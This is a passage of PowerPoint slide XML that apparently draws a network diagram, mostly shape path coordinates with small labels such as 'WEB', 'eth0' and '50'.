                  <a:lnTo>
                    <a:pt x="7643" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5982" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7311" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7975" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7975" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7145" y="9865"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8142" y="9865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8142" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="9865"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="8972" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12462" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="13625" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20271" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20271" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="18609" y="6463"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20437" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20437" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="6463"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F5F1F1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9839823-C4D2-1295-E957-192D54300232}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10714425" y="4391396"/>
              <a:ext cx="278148" cy="107828"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textPlain">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="3600" kern="10">
                  <a:ln w="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>WEB</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="36" name="Group 307">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B0ABA12-2765-85C0-113F-3CA6D0040816}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5525825" y="1967277"/>
            <a:ext cx="331036" cy="275863"/>
            <a:chOff x="144" y="3264"/>
            <a:chExt cx="288" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Rectangle 308">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56CF7C12-094E-6E2B-78F9-C7D30B168E38}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3380"/>
              <a:ext cx="288" cy="124"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="EAEAE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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>eth0</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Rectangle 309">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8992BF67-C320-B6B0-A255-107054E62E41}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="144" y="3264"/>
              <a:ext cx="288" cy="116"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF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lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="it-IT" altLang="it-IT" sz="1000" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>50</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="40" name="Gruppo 39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5881B4C4-5037-1CBA-F24E-BEFC7C0AFCD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2150227" y="4015813"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F5A3E37-2960-6EFE-571B-80BB13611411}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4306849"/>
              <a:ext cx="378624" cy="350441"/>
            </a:xfrm>
            <a:prstGeom prst="cube">
              <a:avLst>
                <a:gd name="adj" fmla="val 15116"/>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endParaRPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9934BB73-3678-9B7B-320D-6BBA87C2EF57}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4360763"/>
              <a:ext cx="324710" cy="296527"/>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 name="T24" fmla="*/ 326 w 21600"/>
                <a:gd name="T25" fmla="*/ 22180 h 21600"/>
                <a:gd name="T26" fmla="*/ 21559 w 21600"/>
                <a:gd name="T27" fmla="*/ 27893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extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="21600" y="10885"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10634" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10800" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="10885"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1163" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16449" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="2381"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2160" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1994" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1994" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
